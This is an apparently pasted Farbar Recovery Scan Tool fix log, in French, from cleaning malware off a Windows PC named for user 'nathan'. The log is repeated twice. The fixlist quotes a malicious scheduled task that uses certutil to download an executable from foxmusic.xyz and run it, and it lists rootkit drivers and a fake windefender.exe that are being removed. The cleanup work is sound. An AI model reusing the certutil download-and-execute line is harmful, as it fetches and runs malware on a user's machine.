Publicité
Publicité
Format du document : text/plain
Prévisualisation
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 13-07-2019
Exécuté par nathan (13-07-2019 17:46:57) Run:6
Exécuté depuis C:\Users\nathan\Desktop
Profils chargés: nathan (Profils disponibles: nathan)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1
DeleteKey: HKLM\SOFTWARE\Wow6432Node\IObit\Advanced SystemCare
DeleteKey: HKLM\SOFTWARE\Wow6432Node\IObit\ASC
DeleteKey: HKLM\SOFTWARE\Wow6432Node\IObit\Driver Booster
C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\000
C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\001
C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\002
C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\Plugins
unlock: C:\Windows\system32\drivers\8f00b204e9800998.sys
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998
C:\Windows\system32\drivers\8f00b204e9800998.sys
C:\Windows\windefender.exe
DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet
DeleteKey: HKCU\SOFTWARE\EpicNet Inc.
DeleteKey: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\EpicNet Inc.
C:\Users\nathan\AppData\Roaming\EpicNet Inc
unlock: C:\Windows\System32\drivers\Winmon.sys
C:\Windows\System32\drivers\Winmon.sys
unlock: C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\WinmonFS.sys
unlock: C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Users\nathan\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{5BFEE7E8-5955-4B8A-BDD7-73E0EEC2F421}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{8CD74997-ACC6-45C8-B107-46E4F6D751A3}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{6328ED04-3C49-48CD-B0BD-4126217142C8}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{CEE6325F-CD04-472A-A536-FFF245610E26}
Task: {0477D444-D9D4-43CB-BA0E-DDCB5A844393} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://foxmusic.xyz/app/app.exe C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe /31340
Task: {4107081B-99FB-4116-93B9-4D7DD56713CD} - \{248E71BD-FD6D-46BF-889A-874915A90435} -> Pas de fichier
Task: {DFB0A61A-AD16-40DE-864E-89AE6D3C641F} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe
CHR HomePage: Default -> hxxp://www.funnysearching.com/
S2 yzrnpmcu; C:\Windows\SysWOW64\yzrnpmcu\jhokjsqh.exe [X]
S4 IUFileFilter; pas de ImagePath
U3 MBAMService; pas de ImagePath
2019-07-05 11:46 - 2019-07-07 11:49 - 000000000 ___HD C:\qtoie9GGJ2DkZWhu
2019-07-03 11:22 - 2019-07-03 11:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnigmaSoft
2019-07-03 11:22 - 2019-07-03 11:22 - 000000000 ____D C:\ProgramData\EnigmaSoft Limited
2019-07-03 11:21 - 2019-07-03 11:21 - 000000000 ____D C:\Program Files\EnigmaSoft
2019-06-29 11:15 - 2019-07-05 11:40 - 000000000 ____D C:\Windows\SysWOW64\yzrnpmcu
2019-07-05 11:40 C:\Windows\SysWOW64\yzrnpmcu
AlternateDataStreams: C:\Users\nathan\AppData\Local\Temp:$DATA [16]
EmptyTemp:
*****************
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1 => non trouvé(e)
HKLM\SOFTWARE\Wow6432Node\IObit\Advanced SystemCare => supprimé(es) avec succès
HKLM\SOFTWARE\Wow6432Node\IObit\ASC => non trouvé(e)
HKLM\SOFTWARE\Wow6432Node\IObit\Driver Booster => non trouvé(e)
"C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\000" => non trouvé(e)
"C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\001" => non trouvé(e)
"C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\002" => non trouvé(e)
"C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\Plugins" => non trouvé(e)
"C:\Windows\system32\drivers\8f00b204e9800998.sys" => a été déverrouillé
HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998 => impossible à supprimer, clé était peut-être protégé(e)
Exécuté par nathan (13-07-2019 17:46:57) Run:6
Exécuté depuis C:\Users\nathan\Desktop
Profils chargés: nathan (Profils disponibles: nathan)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1
DeleteKey: HKLM\SOFTWARE\Wow6432Node\IObit\Advanced SystemCare
DeleteKey: HKLM\SOFTWARE\Wow6432Node\IObit\ASC
DeleteKey: HKLM\SOFTWARE\Wow6432Node\IObit\Driver Booster
C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\000
C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\001
C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\002
C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\Plugins
unlock: C:\Windows\system32\drivers\8f00b204e9800998.sys
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998
C:\Windows\system32\drivers\8f00b204e9800998.sys
C:\Windows\windefender.exe
DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet
DeleteKey: HKCU\SOFTWARE\EpicNet Inc.
DeleteKey: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\EpicNet Inc.
C:\Users\nathan\AppData\Roaming\EpicNet Inc
unlock: C:\Windows\System32\drivers\Winmon.sys
C:\Windows\System32\drivers\Winmon.sys
unlock: C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\WinmonFS.sys
unlock: C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Users\nathan\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{5BFEE7E8-5955-4B8A-BDD7-73E0EEC2F421}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{8CD74997-ACC6-45C8-B107-46E4F6D751A3}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{6328ED04-3C49-48CD-B0BD-4126217142C8}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{CEE6325F-CD04-472A-A536-FFF245610E26}
Task: {0477D444-D9D4-43CB-BA0E-DDCB5A844393} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://foxmusic.xyz/app/app.exe C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe /31340
Task: {4107081B-99FB-4116-93B9-4D7DD56713CD} - \{248E71BD-FD6D-46BF-889A-874915A90435} -> Pas de fichier
Task: {DFB0A61A-AD16-40DE-864E-89AE6D3C641F} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe
CHR HomePage: Default -> hxxp://www.funnysearching.com/
S2 yzrnpmcu; C:\Windows\SysWOW64\yzrnpmcu\jhokjsqh.exe [X]
S4 IUFileFilter; pas de ImagePath
U3 MBAMService; pas de ImagePath
2019-07-05 11:46 - 2019-07-07 11:49 - 000000000 ___HD C:\qtoie9GGJ2DkZWhu
2019-07-03 11:22 - 2019-07-03 11:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnigmaSoft
2019-07-03 11:22 - 2019-07-03 11:22 - 000000000 ____D C:\ProgramData\EnigmaSoft Limited
2019-07-03 11:21 - 2019-07-03 11:21 - 000000000 ____D C:\Program Files\EnigmaSoft
2019-06-29 11:15 - 2019-07-05 11:40 - 000000000 ____D C:\Windows\SysWOW64\yzrnpmcu
2019-07-05 11:40 C:\Windows\SysWOW64\yzrnpmcu
AlternateDataStreams: C:\Users\nathan\AppData\Local\Temp:$DATA [16]
EmptyTemp:
*****************
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1 => non trouvé(e)
HKLM\SOFTWARE\Wow6432Node\IObit\Advanced SystemCare => supprimé(es) avec succès
HKLM\SOFTWARE\Wow6432Node\IObit\ASC => non trouvé(e)
HKLM\SOFTWARE\Wow6432Node\IObit\Driver Booster => non trouvé(e)
"C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\000" => non trouvé(e)
"C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\001" => non trouvé(e)
"C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\002" => non trouvé(e)
"C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\Plugins" => non trouvé(e)
"C:\Windows\system32\drivers\8f00b204e9800998.sys" => a été déverrouillé
HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998 => impossible à supprimer, clé était peut-être protégé(e)